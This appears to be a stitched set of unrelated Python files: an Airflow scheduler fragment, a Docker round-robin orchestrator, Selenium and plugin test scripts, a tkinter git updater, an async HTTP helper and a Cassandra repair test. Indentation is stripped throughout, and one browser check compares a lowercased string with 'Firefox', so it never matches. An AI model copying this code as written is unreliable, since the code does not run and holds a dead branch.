Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED]) # type: ignore
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING]) # type: ignore
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
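# Emit a heartbeat metric every time the base job heartbeats.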
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstance still in QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
self.log.info("Resetting orphaned tasks for active dag runs")
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
for attempt in run_with_db_retries(logger=self.log):
with attempt:
self.log.debug(
"Running SchedulerJob.adopt_or_reset_orphaned_tasks with retries. Try %d of %d",
attempt.retry_state.attempt_number,
MAX_DB_RETRIES,
)
self.log.debug("Calling SchedulerJob.adopt_or_reset_orphaned_tasks method")
try:
num_failed = (
session.query(SchedulerJob)
.filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout)),
)
.update({"state": State.FAILED})
)
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI)
.filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre upgrade. This (and the
# "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(
DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING,
)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info(
"Reset the following %s orphaned TaskInstances:\n\t%s",
len(to_reset),
task_instance_str,
)
                    # Issue SQL/finish "Unit of Work", but let @provide_session
                    # commit (or, if passed a session, let the caller decide when to commit).
session.flush()
except OperationalError:
session.rollback()
raise
return len(to_reset)
|
orchestrator.py
|
from flask import Flask, render_template, request, redirect, abort, jsonify
import threading
import requests
import time, signal, sys
import docker
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
ip = "http://127.0.0.1:"
apis = ['/api/v1/_count',
'/api/v1/_health',
'/api/v1/_crash',
'/api/v1/categories',
'/api/v1/categories/<categoryName>/acts/size',
'/api/v1/categories/<categoryName>/acts',
'/api/v1/categories/<categoryName>',
'/api/v1/acts/count',
'/api/v1/acts/upvote',
'/api/v1/acts/<actId>',
'/api/v1/acts']
app = Flask(__name__)
sem1 = threading.Semaphore()
sem2 = threading.Semaphore()
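# Semaphore handshake (as used below): fun1 holds sem1 until the first container is
# running, which gates the health-check loop in fun2; sem2 is held until the first
# real request reaches hello(), which gates the autoscaling loop in fun3.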
class roundrobin(object):
"""docstring for roundrobin"""
def __init__(self):
super(roundrobin, self).__init__()
self.containers = []
self.next = -1
self.size = 0
self.tot_reqs = 0
self.client = docker.from_env()
def getnext(self):
self.next = (self.next + 1) % self.size
return self.containers[self.next]["port"]
def startnewcontainer(self, port, idx):
#self.next = -1
cont = self.client.containers.run("acts", detach=True, ports={'80/tcp': port}, stop_signal="SIGINT")
        if idx < len(self.containers):  # reuse the slot of a crashed or previously stopped container
self.containers[idx] = {'id':cont.id, 'port':port}
else:
self.containers.append({'id':cont.id, 'port':port})
print(self.containers)
time.sleep(5)
self.size += 1
def stopcontainer(self, idx):
self.size -= 1
self.client.containers.get(self.containers[idx]['id']).stop()
time.sleep(5)
def __del__(self):
print("\ndestroying containers")
for ii, i in enumerate(self.containers):
self.stopcontainer(ii)
r = roundrobin()
@app.route('/', defaults={'path': ''}, methods=['GET', 'POST', 'DELETE'])
@app.route('/<path:path>', methods=['GET', 'POST', 'DELETE'])
def hello(path):
global r, apis
path = '/' + path
if path == "/healthcheck":
return jsonify(success=True)
if (path not in apis) or r.size == 0:
abort(404)
if ((path != '/api/v1/_health') and (path != '/api/v1/_crash')):
if (r.tot_reqs == 0):
sem2.release()
print("releasing sem2")
r.tot_reqs += 1
port = r.getnext()
#return redirect("http://3.210.166.12:"+str(port)+path)
if request.method == "POST":
ret = requests.post(ip+str(port)+path)
elif request.method == "GET":
ret = requests.get(ip+str(port)+path)
else:
ret = requests.delete(ip+str(port)+path)
return jsonify(ret.text), ret.status_code
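# fun1: bring up the first backend container, then serve the Flask app through
# Tornado's HTTPServer on port 80.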
def fun1():
sem1.acquire()
sem2.acquire()
#app.debug=True
r.startnewcontainer(8000, 0)
sem1.release()
#app.run(host='0.0.0.0', port=80)
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(80)
IOLoop.instance().start()
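# fun2: health-check loop; every 10 seconds each container's /api/v1/_health endpoint
# is polled, and a crashed container is stopped and restarted on the same port/slot.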
def fun2():
sem1.acquire()
print("sem1 acquired by fun2")
i = 1
while True:
time.sleep(10)
print("health check batch : ", i)
i += 1
for c, cont in enumerate(r.containers):
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36"}
if requests.get(ip+str(cont['port'])+"/api/v1/_health", headers=headers).status_code != 200:
print("container on : ", cont['port'], " crashed")
r.stopcontainer(c)
r.startnewcontainer(cont['port'], c)
sem1.release()
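# fun3: autoscaling loop; every 2 minutes the target container count is computed as
# int(tot_reqs / 20) + 1 for the requests seen in that window, containers are stopped
# or started to match it, and the request counter is reset.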
def fun3():
sem2.acquire()
print("sem2 acquired by fun3")
while True:
time.sleep(120)
print("orchestrating for : ", r.tot_reqs, " requests")
while r.size > int(r.tot_reqs / 20)+1:
r.stopcontainer(r.size-1)
while r.size < int(r.tot_reqs / 20)+1:
r.startnewcontainer(r.size+8000, r.size)
r.tot_reqs = 0
sem2.release()
def handler(sig, frame):
global r
r.__del__()
sys.exit(0)
if __name__ == "__main__":
signal.signal(signal.SIGINT, handler)
#signal.signal(signal.SIGTSTP, handler)
print('press CTRL+C to exit')
thread1 = threading.Thread(target = fun1)
thread2 = threading.Thread(target = fun2)
thread3 = threading.Thread(target = fun3)
thread1.start()
thread2.start()
thread3.start()
|
run_tests.py
|
#!/usr/bin/env python
'''
Run tests for Pannellum, set up with Continuous Integration.
Contributed by Vanessa Sochat, JoSS Review 2019.
See the project repository for licensing information.
'''
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from random import choice
from threading import Thread
from selenium import webdriver
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from PIL import Image, ImageChops
import argparse
import json
import io
import numpy
import os
import re
import shutil
import subprocess
import sys
import time
import webbrowser
class PannellumServer(SimpleHTTPRequestHandler):
    '''here we subclass SimpleHTTPRequestHandler to capture error messages
'''
def log_message(self, format, *args):
'''log to standard error with a date time string,
and then call any subclass specific logging functions
'''
sys.stderr.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format%args))
# Workaround for error trying to GET html
if not re.search("div", format%args) and not re.search("function", format%args):
if re.search("404", format%args):
raise IOError(format%args)
def log_error(self, format, *args):
'''catch errors in the log_messages instead
'''
pass
class PannellumTester(object):
''' bring up a server with a testing robot
'''
def __init__(self, port=None, browser="Chrome", headless=False):
self.Handler = PannellumServer
if port:
self.port = port
else:
self.port = choice(range(8000, 9999))
print('Selected port is %s' % self.port)
self.httpd = TCPServer(("", self.port), self.Handler)
self.server = Thread(target=self.httpd.serve_forever)
self.server.setDaemon(True)
self.server.start()
self.started = True
self.pause_time = 100
self.browser = None
self.headless = headless
self.display = None
self.driver = browser
def take_screenshot(self, output_file, element_id):
'''take a screenshot and save to file based on element id
'''
element = self.browser.find_element_by_id(element_id)
location = element.location
self.browser.save_screenshot(output_file)
# Now crop to correct size
x = location['x']
y = location['y']
width = location['x'] + element.size['width']
height = location['y'] + element.size['height']
im = Image.open(output_file)
im = im.crop((int(x), int(y), int(width), int(height)))
im.save(output_file)
return Image.open(output_file)
def equal_images(self, image1, image2, name, threshold=3):
        '''compare two images, both loaded with PIL, based on the mean pixel difference'''
diff = numpy.mean(numpy.array(ImageChops.difference(image1, image2)))
print("%s difference: %s" % (name, diff))
assert diff < threshold
def run_tests(self, create_ref=False):
'''run tests for Pannellum'''
print("Loading page...")
self.get_page("http://localhost:%s/tests/tests.html" % self.port)
print("Running tests...")
time.sleep(5)
assert self.browser.execute_script("return viewer.isLoaded()") == True
# Check equirectangular
assert self.browser.execute_script("return viewer.getScene() == 'equirectangular'")
if create_ref:
self.take_screenshot("tests/equirectangular.png", "panorama")
else:
reference = Image.open("tests/equirectangular.png")
comparator = self.take_screenshot("tests/equirectangular-comparison.png", "panorama")
self.equal_images(reference, comparator, 'equirectangular')
print('PASS: equirectangular')
# Check movement
self.browser.execute_script("viewer.setPitch(30).setYaw(-20).setHfov(90)")
time.sleep(2)
assert self.browser.execute_script(
"return viewer.getPitch() == 30 && viewer.getYaw() == -20 && viewer.getHfov() == 90"
)
self.browser.find_element_by_class_name("pnlm-zoom-in").click()
time.sleep(1)
assert self.browser.execute_script("return viewer.getHfov() == 85")
self.browser.find_element_by_class_name("pnlm-zoom-out").click()
time.sleep(1)
assert self.browser.execute_script("return viewer.getHfov() == 90")
print("PASS: movement")
# Check look at
self.browser.execute_script("viewer.lookAt(-10, 90, 100)")
time.sleep(2)
assert self.browser.execute_script(
"return viewer.getPitch() == -10 && viewer.getYaw() == 90 && viewer.getHfov() == 100"
)
print("PASS: look at")
# Check cube
self.browser.execute_script("viewer.loadScene('cube')")
time.sleep(5)
assert self.browser.execute_script("return viewer.getScene() == 'cube'")
if create_ref:
self.take_screenshot("tests/cube.png", "panorama")
else:
reference = Image.open("tests/cube.png")
comparator = self.take_screenshot("tests/cube-comparison.png", "panorama")
self.equal_images(reference, comparator, 'cube')
# Check hot spot
self.browser.find_element_by_class_name("pnlm-scene").click()
time.sleep(5)
assert self.browser.execute_script("return viewer.getScene() == 'multires'")
print("PASS: hot spot")
# Check multires
if create_ref:
self.take_screenshot("tests/multires.png", "panorama")
else:
reference = Image.open("tests/multires.png")
comparator = self.take_screenshot("tests/multires-comparison.png", "panorama")
self.equal_images(reference, comparator, 'multires')
self.httpd.server_close()
def get_browser(self,name=None):
'''get_browser
return a browser if it hasn't been initialized yet
'''
if name is None:
name=self.driver
log_path = "%s-driver.log" % name.lower()
if self.browser is None:
options = self.get_options()
if name.lower() == "Firefox":
self.browser = webdriver.Firefox(service_log_path=log_path)
else:
self.browser = webdriver.Chrome(service_log_path=log_path,
options=options)
return self.browser
def get_options(self, width=1200, height=800):
'''return options for headless, no-sandbox, and custom width/height
'''
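        # With the default arguments this requests a headless, no-sandbox Chrome
        # session with a 1200x800 window.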
options = webdriver.ChromeOptions()
options.add_argument("headless")
options.add_argument("no-sandbox")
options.add_argument("window-size=%sx%s" %(width, height))
return options
def get_page(self, url, name='Chrome'):
'''get_page
open a particular url, checking for Timeout
'''
if self.browser is None:
self.browser = self.get_browser(name)
try:
return self.browser.get(url)
except TimeoutException:
print('Browser request timeout. Are you connected to the internet?')
self.browser.close()
sys.exit(1)
def stop(self):
'''close any running browser or server, and shut down the robot
'''
if self.browser is not None:
self.browser.close()
self.httpd.server_close()
if self.display is not None:
self.display.close()
## MAIN ########################################################################
def get_parser():
parser = argparse.ArgumentParser(
description="run tests for Pannellum")
parser.add_argument("--port",'-p', dest='port',
help="port to run webserver",
type=int, default=None)
parser.add_argument("--headless", dest='headless',
help="start a display before browser",
action="store_true", default=False)
parser.add_argument("--create-ref", dest='create_ref',
action="store_true", default=False)
parser.add_argument("--browser",'-b', dest='browser',
choices=['Firefox', 'Chrome'],
help="browser driver to use for the robot",
type=str, default="Chrome")
return parser
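# Illustrative invocation (values are examples, not requirements):
#   python run_tests.py --browser Chrome --headless --port 8000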
def main():
parser = get_parser()
try:
args = parser.parse_args()
except:
sys.exit(0)
# The drivers must be on path
here = os.path.abspath(os.path.dirname(__file__))
os.environ['PATH'] = "%s/drivers:%s" %(here, os.environ['PATH'])
os.chdir(here)
# We must be in root directory
os.chdir('../')
    # Initialize the tester
tester = PannellumTester(browser=args.browser,
port=args.port,
headless=args.headless)
# Run tests
tester.run_tests(create_ref=args.create_ref)
# Clean up shop!
tester.stop()
if __name__ == '__main__':
main()
|
test.py
|
#!/usr/bin/env python3
import datetime
import sys
import requests
import os
import time
import threading
from mfutil import BashWrapperOrRaise
NGINX_PORT = int(os.environ['MFSERV_NGINX_PORT'])
RUN = True
RES = True
BashWrapperOrRaise("rm -Rf foobar")
BashWrapperOrRaise("plugins.uninstall foobar || true")
print(BashWrapperOrRaise("bootstrap_plugin.py create "
"--template=python3_django "
"--no-input foobar"))
print(BashWrapperOrRaise("cd foobar && make release"))
print(BashWrapperOrRaise('cd foobar && plugins.install "$(ls *.plugin)"'))
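# Test flow: build and install the "foobar" django plugin, wait until /foobar answers,
# then hotswap the plugin while continuously checking that the endpoint keeps returning
# 200 / "Hello World"; any failure flips RES and fails the test.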
def continuous_check():
global RES
while RUN:
url = "http://127.0.0.1:%i/foobar" % NGINX_PORT
x = requests.get(url, timeout=3)
if x.status_code != 200:
print("bad status code: %i" % x.status_code)
print(x)
RES = False
if "Hello World" not in x.text:
print("bad output: %s" % x.text)
print(x)
RES = False
time.sleep(0.1)
now_fn = datetime.datetime.now
before = now_fn()
code = 1
while (now_fn() - before).total_seconds() <= 30:
time.sleep(1)
url = "http://127.0.0.1:%i/foobar" % NGINX_PORT
print("trying GET %s..." % url)
try:
x = requests.get(url, timeout=3)
except Exception:
continue
if x.status_code == 200:
if "Hello World" in x.text:
code = 0
break
if code != 0:
print("ERROR: can't get a valid output")
sys.exit(code)
# let's start a continuous_check
t = threading.Thread(target=continuous_check)
t.start()
print(BashWrapperOrRaise('cd foobar && plugins.hotswap "$(ls *.plugin)"'))
RUN = False
t.join()
if RES is False:
sys.exit(1)
BashWrapperOrRaise("plugins.uninstall foobar")
BashWrapperOrRaise("rm -Rf foobar")
print("ok")
sys.exit(0)
|
updater.py
|
from subprocess import call
import os, sys
import shutil
from os import path
#from tkinter import *
from threading import Thread
import tkinter as tk
#from tk import tkFileDialog
from tkinter import filedialog as fd
from tkinter import messagebox as mb
#from tk import tkMessageBox
import logging
from logging import handlers
import csv
# Include the generators
#sys.path.append(os.getcwd())
# print sys.path
from generators import *
import generators
## This file implements the project downloader.
## It is used for pulling and building all of my software
##
## @author Daniel J. Finnegan
## @date July 2017
####################################################################
class App:
    def __init__(self, master):
        self.master = master
        self.frame = tk.Frame(master, height=640, width=480)
        self.menu = tk.Menu(master)
if sys.platform == 'darwin':
            self.appmenu = tk.Menu(self.menu, name='apple')  # Some extra fiddling about for OSX
self.menu.add_cascade(menu=self.appmenu)
self.appmenu.add_command(label='About Updater')
self.initialize()
def initialize(self):
self.frame.grid()
self.init_vars()
self.init_controls()
self.init_menu()
self.init_gui()
def init_vars(self):
self.project_table = {'': ''} # Empty table
self.project_titles = sorted(self.project_table.keys()) # Get a sorted list of the keys
self.branches = ['master', 'testing']
# self.generators = ['Unity', 'C++', 'LaTeX', 'R']
self.generators = generators.Generators
if sys.platform == 'darwin':
self.project_root = '/home/'
else:
self.project_root = 'C:\\'
# Set the logger
if sys.platform == 'darwin':
self.logger = logging.getLogger()
syslogH = handlers.SysLogHandler(address='/var/run/syslog', facility='local1')
syslogH.ident = 'updater_application:'
self.logger.addHandler(syslogH)
else: # Handle the Windows case
self.logger = logging.getLogger('updater_application')
self.logger.setLevel(logging.INFO)
def init_controls(self):
self.project_root_text = tk.StringVar()
self.project_root_text.set(self.project_root)
self.project_titles_var = tk.StringVar()
self.project_titles_var.set(self.project_titles[0])
self.branches_var = tk.StringVar()
self.branches_var.set(self.branches[0])
self.generators_var = tk.StringVar()
self.generators_var.set(self.generators[0])
def init_menu(self):
if sys.platform == 'darwin': # We need to use the appmenu object for OSX applications
self.appmenu.add_command(label='Quit', command=self.frame.quit)
self.appmenu.add_command(label='Load Projects File', command=self.load_projects)
self.appmenu.add_separator()
else:
self.menu.add_command(label='Quit', command=self.frame.quit)
self.menu.add_command(label='Load Projects File', command=self.load_projects)
        self.master.config(menu=self.menu)
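    # The projects file is expected to be a CSV with (at least) the columns
    # "Project Name" and "Project URL", e.g. (illustrative):
    #   Project Name,Project URL
    #   my-experiment,https://example.com/me/my-experiment.git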
def load_projects(self, *args):
        projects_file = fd.askopenfilename(filetypes=[('project files', 'txt')], parent=self.frame)
if projects_file is None or projects_file == '':
return
self.project_table = {} # clear the existing table
with open(projects_file) as proj_file: # read in the projects from the file
reader = csv.DictReader(proj_file)
for row in reader:
self.project_table[row['Project Name']] = row['Project URL']
# TODO: Catch errors here in the file reader
self.project_titles = sorted(self.project_table.keys()) # Get a sorted list of the keys
self.project_titles_var.set(self.project_titles[0])
menu = self.projects_options['menu']
menu.delete(0, 'end')
for project in self.project_titles: # Repopulate
menu.add_command(label=project, command=lambda title=project: self.project_titles_var.set(title))
def init_gui(self):
# Option box for selecting the project to install
self.project_label = tk.Label(self.frame, text='Project to Install or Update:')
self.projects_options = tk.OptionMenu(self.frame, self.project_titles_var, '')
self.project_label.grid(column=0, row=0, sticky='W')
self.projects_options.grid(column=1, columnspan=3, row = 0, sticky='W')
# Option box for selecting the project to install
self.branch_label = tk.Label(self.frame, text='Branch to Install or Update:')
self.project_branches = tk.OptionMenu(self.frame, self.branches_var, *self.branches)
self.branch_label.grid(column=0, row=1, sticky='W')
self.project_branches.grid(column=1, columnspan=3, row = 1, sticky='W')
# Entry for specifying the directory to install the project
# Complete with side label and action button
self.directory_label = tk.Label(self.frame, text='Project Directory to Install or Update:')
self.directory_entry = tk.Entry(self.frame, textvariable=self.project_root_text, width=50)
self.set_directory_button = tk.Button(self.frame, text="Set Directory", command=self.find_dir)
self.directory_label.grid(column=0, row=2, sticky='EW')
self.directory_entry.grid(column=1, columnspan=2, row=2, sticky='EW')
self.set_directory_button.grid(column=3, row=2, sticky='EW')
# Action button for creating
self.create_button = tk.Button(self.frame, text='Create', command=self.create_project)
self.project_generators = tk.OptionMenu(self.frame, self.generators_var, *self.generators)
self.create_button.grid(column=0, row=3, sticky='EW')
self.project_generators.grid(column=1, columnspan=2, row = 3, sticky='EW')
# Action button for updating
self.build_button = tk.Button(self.frame, text='Build', command=self.do_build_task)
self.build_button.grid(column=0, row=4, sticky='EW')
self.update_button = tk.Button(self.frame, text='Update', command=self.do_task)
self.update_button.grid(column=1, row=4, columnspan=2, sticky='EW')
# Text box for log output
self.log = tk.Text(self.frame, height=20, takefocus=0)
self.log.grid(column=0, columnspan=4, row=5, sticky='EW')
def find_dir(self):
        project_root = fd.askdirectory()
        if not project_root:  # askdirectory() returns '' when the dialog is cancelled
            return
        self.project_root = project_root
self.project_root_text.set(self.project_root)
def build_project(self, project_to_build_dir=None):
if project_to_build_dir is None:
project_to_build_dir = self.project_root
self.log_message('Building the software package...')
sys.path.append(os.path.join(project_to_build_dir, 'scripts'))
os.chdir(os.path.join(project_to_build_dir))
# Import the build script as a python module and then build it
# If no custom build operation is specified, then make a standard call to cmake
from builder import build_project
if build_project.UPDATER_BUILD_CUSTOM:
build_project.build_full_package(project_to_build_dir) # Pass in the root directory
else:
if os.path.isdir(os.path.join(project_to_build_dir, 'bin')):
shutil.rmtree(os.path.join(project_to_build_dir, 'bin'))
os.mkdir(os.path.join(project_to_build_dir, 'bin'))
os.chdir(os.path.join(project_to_build_dir, 'bin'))
rc = call(['cmake'] + build_project.UPDATER_CMAKE_ARGS + ['..'])
if rc != 0:
self.log_message(message='Project is missing a CMakeLists.txt file. Contact the package maintainer')
else:
call(['cmake', '--build', '.'])
self.log_message('Check project directory for build output files.')
def update_project(self):
self.log_message(message='Updating the software package...')
call(['git', '-C', self.project_root, 'checkout', '--', '.']) # Clear any local changes
call(['git', '-C', self.project_root, 'checkout', self.branches_var.get()]) # Checkout the master branch
call(['git', '-C', self.project_root, 'pull', 'origin', self.branches_var.get()]) # Pull the changes made in the project from the repo
self.log_message('Software updated!')
def download_project(self):
self.log_message(message='Downloading the software...')
project_url = self.project_table[self.project_titles_var.get()]
call(['git', '-C', self.project_root, 'clone', project_url, self.project_titles_var.get()]) # Clone the project from the remote repo
self.project_root = os.path.join(self.project_root, self.project_titles_var.get()) # Update the directory name to reflect the downloaded package
call(['git', '-C', self.project_root, 'checkout', self.branches_var.get()]) # Checkout the branch
self.log_message('Software downloaded!')
def do_task(self):
# Check if the current selected project is empty
if self.project_titles_var.get() == '':
mb.showerror(title='Missing Project', message='Please load the projects list file')
return
# Add paths
if sys.platform == 'darwin':
# sys.path.append('/usr/local/bin')
os.environ['PATH'] += ':' + '/usr/local/bin' # Patch for homebrew installations
elif sys.platform == 'win32':
self.log_message(message='Windows is buggy. Please report any issues')
else:
self.log_message(message='Platform unsupported. Aborting')
return
rc = call(['git', '-C', self.project_root, 'status']) # Run git status
if rc == 0:
def update_in_thread():
self.update_button.config(state=tk.DISABLED)
self.create_button.config(state=tk.DISABLED)
self.build_button.config(state=tk.DISABLED)
self.update_project()
self.build_project() # Pass in the project root folder
self.update_button.config(state=tk.ACTIVE)
self.create_button.config(state=tk.ACTIVE)
self.build_button.config(state=tk.ACTIVE)
return
thread = Thread(target=update_in_thread)
thread.start()
return thread
else:
def download_in_thread():
self.update_button.config(state=tk.DISABLED)
self.create_button.config(state=tk.DISABLED)
self.build_button.config(state=tk.DISABLED)
self.download_project()
self.build_project()
self.update_button.config(state=tk.ACTIVE)
self.create_button.config(state=tk.ACTIVE)
self.build_button.config(state=tk.ACTIVE)
return
thread = Thread(target=download_in_thread)
thread.start()
return thread
def create_project(self):
def create_in_thread():
self.update_button.config(state=tk.DISABLED)
self.create_button.config(state=tk.DISABLED)
self.build_button.config(state=tk.DISABLED)
# Load the generator based on name
project_generator = generators.load_generator(self.generators_var.get(), self.project_root_text.get())
self.log_message(message='Generating the project...')
rc = project_generator.generate_project()
if rc == 0:
self.log_message('Project generated!')
else:
self.log_message('Project not generated. Check log for issues')
self.update_button.config(state=tk.ACTIVE)
self.create_button.config(state=tk.ACTIVE)
self.build_button.config(state=tk.ACTIVE)
thread = Thread(target=create_in_thread)
thread.start()
return thread
def do_build_task(self):
def create_in_thread():
self.update_button.config(state=tk.DISABLED)
self.create_button.config(state=tk.DISABLED)
self.build_button.config(state=tk.DISABLED)
print ('Building the project at', self.project_root_text.get())
self.build_project(self.project_root_text.get()) # Pass in the project root folder
self.update_button.config(state=tk.ACTIVE)
self.create_button.config(state=tk.ACTIVE)
self.build_button.config(state=tk.ACTIVE)
thread = Thread(target=create_in_thread)
thread.start()
return thread
def log_message(self, message=''):
self.logger.info(message) # Log to the logger too
self.log.insert(tk.INSERT, message)
self.log.insert(tk.INSERT, '\n')
self.log.see(tk.END)
if __name__ == '__main__':
root = tk.Tk()
root.title('Experiment Updater')
# root.title('Experiment Updater (Testing branch)')
app = App(root)
root.mainloop()
# root.destroy()
|
api.py
|
import socket
import urllib.parse
from selectors import DefaultSelector, EVENT_WRITE, EVENT_READ
from threading import Thread
from ..core.eventQueue import eventQueue
from ..core.eventloop import LoopManager
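# get() below issues a non-blocking HTTP GET: the socket is registered with a selector,
# a small select() loop runs in a background thread, and once the full response has been
# read the user callback (and asyncDone) are pushed onto the shared eventQueue.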
@LoopManager.asyncapi
def get(*, url, callback, asyncDone):
urlObj = urllib.parse.urlparse(url)
selector = DefaultSelector()
sock = socket.socket()
sock.setblocking(False)
def connected():
selector.unregister(sock.fileno())
selector.register(sock.fileno(), EVENT_READ, responded)
        request_path = urlObj.path if urlObj.path != '' else '/'
        query_string = '?' + urlObj.query if urlObj.query != '' else ''
        sock.send(
            f"GET {request_path}{query_string} HTTP/1.0\r\nHost: {urlObj.hostname}\r\n\r\n"
            .encode('ascii')
        )
responseData = bytes()
def responded():
nonlocal responseData
chunk = sock.recv(4096)
if chunk:
responseData += chunk
else:
selector.unregister(sock.fileno())
eventQueue.pushCallback(
lambda: (callback(responseData), asyncDone(responseData)))
nonlocal __stop
__stop = True
__stop = False
def loop():
while True:
events = selector.select()
for event_key, event_mask in events:
cbk = event_key.data
cbk()
if __stop:
break
selector.register(sock.fileno(), EVENT_WRITE, connected)
try:
sock.connect(
            (urlObj.hostname, urlObj.port if urlObj.port is not None else 80)
)
except BlockingIOError:
pass
Thread(target=loop).start()
|
repair_test.py
|
import os
import os.path
import threading
import time
import re
import pytest
import logging
from collections import namedtuple
from threading import Thread
from cassandra import ConsistencyLevel
from cassandra.query import SimpleStatement
from ccmlib.node import ToolError
from dtest import FlakyRetryPolicy, Tester, create_ks, create_cf, mk_bman_path
from tools.data import insert_c1c2, query_c1c2
from tools.jmxutils import JolokiaAgent, make_mbean
from repair_tests.incremental_repair_test import assert_parent_repair_session_count
since = pytest.mark.since
logger = logging.getLogger(__name__)
def _repair_options(version, ks='', cf=None, sequential=True):
"""
Function for assembling appropriate repair CLI options,
based on C* version, as defaults have changed.
@param ks The keyspace to repair
@param cf The table to repair
@param sequential If the repair should be a sequential repair [vs parallel]
"""
opts = []
# since version 2.2, default is parallel, otherwise it's sequential
if sequential:
if version >= '2.2':
opts += ['-seq']
else:
if version < '2.2':
opts += ['-par']
# test with full repair
if version >= '2.2':
opts += ['-full']
if ks:
opts += [ks]
if cf:
opts += [cf]
return opts
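# Illustrative example: _repair_options('3.11', ks='ks', cf='cf', sequential=False)
# returns ['-full', 'ks', 'cf'], while sequential=True on the same version adds '-seq'.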
class BaseRepairTest(Tester):
def check_rows_on_node(self, node_to_check, rows, found=None, missings=None, restart=True):
"""
Function to verify the rows on a given node, without interference
from the other nodes in the cluster
@param node_to_check The given node to check. Should be the node, not the index
@param rows The number of rows we expect
@param found A list of partition keys that we expect to be on the node
@param missings A list of partition keys we expect NOT to be on the node
@param restart Whether or not we should restart the nodes we shut down to perform the assertions. Should only be False if the call to check_rows_on_node is the last line in the test.
"""
if found is None:
found = []
if missings is None:
missings = []
stopped_nodes = []
for node in list(self.cluster.nodes.values()):
if node.is_running() and node is not node_to_check:
stopped_nodes.append(node)
node.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node_to_check, 'ks')
result = list(session.execute("SELECT * FROM cf LIMIT {}".format(rows * 2), timeout=10))
assert len(result) == rows
for k in found:
query_c1c2(session, k, ConsistencyLevel.ONE)
for k in missings:
query = SimpleStatement("SELECT c1, c2 FROM cf WHERE key='k{}'".format(k), consistency_level=ConsistencyLevel.ONE)
res = list(session.execute(query))
assert len([x for x in res if len(x) != 0]) == 0, res
if restart:
for node in stopped_nodes:
node.start(wait_for_binary_proto=True)
def _populate_cluster(self, start=True):
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test (this must be after the populate)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1, retry_policy=FlakyRetryPolicy(max_retries=15))
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'})
else:
create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
# Insert 1000 keys, kill node 3, insert 1 key, restart node 3, insert 1000 more keys
logger.debug("Inserting data...")
insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL, ks='ks')
node3.flush()
node3.stop(wait_other_notice=True)
insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.TWO, ks='ks')
node3.start(wait_for_binary_proto=True)
insert_c1c2(session, keys=list(range(1001, 2001)), consistency=ConsistencyLevel.ALL, ks='ks')
cluster.flush()
def _repair_and_verify(self, sequential=True):
cluster = self.cluster
node1, node2, node3 = cluster.nodelist()
# Verify that node3 has only 2000 keys
logger.debug("Checking data on node3...")
self.check_rows_on_node(node3, 2000, missings=[1000])
# Verify that node1 has 2001 keys
logger.debug("Checking data on node1...")
self.check_rows_on_node(node1, 2001, found=[1000])
# Verify that node2 has 2001 keys
logger.debug("Checking data on node2...")
self.check_rows_on_node(node2, 2001, found=[1000])
time.sleep(10) # see CASSANDRA-4373
# Run repair
start = time.time()
logger.debug("starting repair...")
node1.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
logger.debug("Repair time: {end}".format(end=time.time() - start))
        # Validate that only one range was transferred
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs])
valid_out_of_sync_pairs = [{node1.address(), node3.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
